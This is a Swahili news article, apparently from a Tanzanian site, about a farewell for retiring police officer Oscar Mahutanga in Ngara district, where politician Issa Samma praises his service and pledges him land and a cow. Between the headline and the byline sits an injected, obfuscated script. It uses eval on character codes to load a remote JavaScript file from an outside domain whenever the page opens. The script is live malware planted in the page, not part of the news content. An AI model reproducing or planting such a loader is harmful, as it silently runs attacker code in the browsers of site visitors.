Recent Comments

UTUMISHI WA OCS OSCAR MAHUTANGA WAMKUNA ISSA SAMMA

By Mwafrika Aug 14, 2023
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

UTUMISHI WA OCS OSCAR MAHUTANGA WAMKUNA ISSA SAMMA

NA:ANKO G

Kufuatia kustafu kwa Oscar Mahutanga aliekua askari polisi kwa muda usiopungua miaka 30 katika wilaya ya Ngara.

Jambo hili limemvutia mfanya biashara na kiongozi wa kisiasa kwa muda mrefu ambae kwa sasa ni mjumbe wa halmashauri kuu mkoa wa kagera kupitia CCM bwana Issa Hussein Samma kuguswa na utumishi wake.

Samma ameyasema hayo katika hafla ya kumuaga Ocs Oscar Mahutanga iliyo andaliwa na wanachi wa Kabanga ambapo amesema kuwa hafla hiyo inamfundisha mambo mengi kwani ni mara chache sana kusikia raia wakimuaga askari hii inadhihirisha kuwa askari huyo amekua karibu na wanachi pamoja na kuitendea haki taaluma yake.

(pichani Oscar mahutanga akiwa na mke wake)

Hata hivyo Samma amesema kuwa anamfahamu Oscar tangu mwaka 1991 alipo anza shughuli yake ya upolisi katika kituo cha Ngara mjini wakati akiwa kijana na alikua anaanza biashara yake ya usafirishaji kwa kutumia mabasi na kusema kuwa Oscar alikua na ubinadamu ndani yeke ambao unatakiwa kwa jamii.Vilevile Osacar amefanya kazi katika vituo viwili ambapo alianzia kituo cha ngara mjini mwaka 1991 na kuhamishishiwa kituo cha Kabanga mwaka 2011.

Umri wake wote ameitumikia jamii ya ngara hivyo Samma amewapongeza wanakabanga kwa kuona vyema kumuaga.Pia Samma kwa kushirikiana na diwani wa kata ya Kabanga Hafidh Abdallah wameahidi kumlipia kiwanja mahali popote katika wilaya ya ngara kati ya kata ya Kabanga au Ngara mjini ili aendelee kuishi Ngara Pamoja na kumnunulia ng’omba jike wa maziwa.

Samma amemaliza kwa kusema kuwa hafla hii imemfundisha mengi sana na kuwapongeza waandaaji wa hafla hiyo kwa kuona vyema kumuanga Osc Oscar mahutanga kutokana na kazi nzuri aliyo ifanya katika jamii ya ngara.